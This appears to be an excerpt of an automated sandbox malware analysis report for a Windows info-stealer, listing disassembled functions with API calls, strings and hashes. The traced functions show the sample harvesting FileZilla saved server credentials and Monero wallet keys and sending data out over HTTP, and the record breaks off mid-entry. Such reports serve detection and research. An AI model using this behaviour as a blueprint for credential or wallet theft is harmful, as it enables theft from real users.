                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba0b087c21735805ba17008e519b36369e74906459be8726d2fa0da6988b64fa
                        • Instruction ID: cdab9998adbb676aa54dcf1404a54c2fddcac8a802a19b12ce6be1943640c66c
                        • Opcode Fuzzy Hash: ba0b087c21735805ba17008e519b36369e74906459be8726d2fa0da6988b64fa
                        • Instruction Fuzzy Hash: 15512BF3E082109BE718AE69DC9572AB7D5EF94320F1B493EDAC9D7380E579480587C2
                        Function 004DD5C8 Relevance: .2, Instructions: 171COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4441156e37c01fe52a475e41c9f7adf2a2018f5f52e3f1061831859aa5589378
                        • Instruction ID: 3771aa62d0712a1e79ba9bf754864231dc8e7328fb55c2941c374e8e7d863bdf
                        • Opcode Fuzzy Hash: 4441156e37c01fe52a475e41c9f7adf2a2018f5f52e3f1061831859aa5589378
                        • Instruction Fuzzy Hash: E64166F3E181145BE3189D2CEC8475AB7DAEBA4620F2B453DDA89E3744E8796C0183C2
                        Function 00576292 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eaf9efda7d1c1dc98a6c752829d21a90d3e151df6a7b04e7dc134531d63621ff
                        • Instruction ID: 9401c25d7126507f454f8e4c5e1666b6f64efe68a8b93f6b7a9170e515af7872
                        • Opcode Fuzzy Hash: eaf9efda7d1c1dc98a6c752829d21a90d3e151df6a7b04e7dc134531d63621ff
                        • Instruction Fuzzy Hash: C14157F39082149BF3146E29CC4477AB7D6EF90720F2B453DDAD593780EA3919058796
                        Function 0061BE2C Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ce5056be54e199d24b73b9e98b3b1840685c183105ec34dee7633fd20f5c9c8
                        • Instruction ID: 181ffdf65ad595e6fc7f0304db12348b091f5ed1a2a5492dd9e56b5e32ad7890
                        • Opcode Fuzzy Hash: 4ce5056be54e199d24b73b9e98b3b1840685c183105ec34dee7633fd20f5c9c8
                        • Instruction Fuzzy Hash: 5031D2B220C7089FD314AF59DCC266AF7E9EF98310F56892DD7D083340E675A815CA5A
                        Function 00279750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 00270250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00280DBA,00280DB7,00280DB6,00280DB3), ref: 00270362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00270369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00270385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 002703CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 002703DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00270419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00270463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 0027051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 0027054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00270562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00270571
                        • lstrcat.KERNEL32(?,url: ), ref: 00270580
                        • lstrcat.KERNEL32(?,00000000), ref: 00270593
                        • lstrcat.KERNEL32(?,00281678), ref: 002705A2
                        • lstrcat.KERNEL32(?,00000000), ref: 002705B5
                        • lstrcat.KERNEL32(?,0028167C), ref: 002705C4
                        • lstrcat.KERNEL32(?,login: ), ref: 002705D3
                        • lstrcat.KERNEL32(?,00000000), ref: 002705E6
                        • lstrcat.KERNEL32(?,00281688), ref: 002705F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00270604
                        • lstrcat.KERNEL32(?,00000000), ref: 00270617
                        • lstrcat.KERNEL32(?,00281698), ref: 00270626
                        • lstrcat.KERNEL32(?,0028169C), ref: 00270635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 0027068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 37033d0e51da534bb05f289ddeeb86be5114c38812d8213899f275a1eed980ad
                        • Instruction ID: 441775c95aaa8f27a3db7fe50adea81437ae60999ef45d7d00ae15c49e95068e
                        • Opcode Fuzzy Hash: 37033d0e51da534bb05f289ddeeb86be5114c38812d8213899f275a1eed980ad
                        • Instruction Fuzzy Hash: 3DD13E759201089BCB04FBF4DD96DEE773CAF55310F408528F106A6091EF34AA6ACF66
                        Function 00265960 Relevance: 42.5, APIs: 17, Strings: 7, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                          • Part of subcall function 002647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002659F8
                        • StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00265A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00265B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E2EA08,00000000,?,00E2A1C0,00000000,?,00281A1C), ref: 00265E71
                        • lstrlen.KERNEL32(00000000), ref: 00265E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00265E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00265E9A
                        • lstrlen.KERNEL32(00000000), ref: 00265EAF
                        • lstrlen.KERNEL32(00000000), ref: 00265ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00265EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00265F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00265F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00265F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00265FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00265FBD
                        • HttpOpenRequestA.WININET(00000000,00E2E9C8,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00265BF8
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • InternetCloseHandle.WININET(00000000), ref: 00265FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------$8$x
                        • API String ID: 874700897-3110365316
                        • Opcode ID: 3ad655afa3db347b3b94e09e5f3e3e982af9b56ba70aacef1a0cf711312b236e
                        • Instruction ID: 6a34cda878386f82e9395bd93df5174f7aef94ac5456b950b55a5e688df6e2ac
                        • Opcode Fuzzy Hash: 3ad655afa3db347b3b94e09e5f3e3e982af9b56ba70aacef1a0cf711312b236e
                        • Instruction Fuzzy Hash: 78122171830118ABDB15EBA0DC96FEEB378BF54710F5081A9F11A62091DF702A69CF66
                        Function 0026CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0026CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0026D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0026D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D208
                        • lstrcat.KERNEL32(?,00281478), ref: 0026D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D22A
                        • lstrcat.KERNEL32(?,0028147C), ref: 0026D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D24C
                        • lstrcat.KERNEL32(?,00281480), ref: 0026D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D26E
                        • lstrcat.KERNEL32(?,00281484), ref: 0026D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D290
                        • lstrcat.KERNEL32(?,00281488), ref: 0026D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D2B2
                        • lstrcat.KERNEL32(?,0028148C), ref: 0026D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D2D4
                        • lstrcat.KERNEL32(?,00281490), ref: 0026D2E3
                          • Part of subcall function 0027A820: lstrlen.KERNEL32(00264F05,?,?,00264F05,00280DDE), ref: 0027A82B
                          • Part of subcall function 0027A820: lstrcpy.KERNEL32(00280DDE,00000000), ref: 0027A885
                        • lstrlen.KERNEL32(?), ref: 0026D32A
                        • lstrlen.KERNEL32(?), ref: 0026D339
                          • Part of subcall function 0027AA70: StrCmpCA.SHLWAPI(00E29100,0026A7A7,?,0026A7A7,00E29100), ref: 0027AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0026D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: e43be1fedfdd26bef72541932365485ee9eb368f6574b0b047c75aa309fe1a6e
                        • Instruction ID: b332d411a6d585d1229279f7d7a20f1621e41bc972f8290c8653f6a24e75f0d8
                        • Opcode Fuzzy Hash: e43be1fedfdd26bef72541932365485ee9eb368f6574b0b047c75aa309fe1a6e
                        • Instruction Fuzzy Hash: B0E10F71920108ABCB04FBA0DD96EEE7778AF55311F508168F10BA6091DF35AE26CF67
                        Function 002712D0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 310COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID: $8$P$
                        • API String ID: 2001356338-1949458441
                        • Opcode ID: 1a0f43f41f270ac214b25b65e24aea44495f135c3c47f98cdf1cff69c39f6544
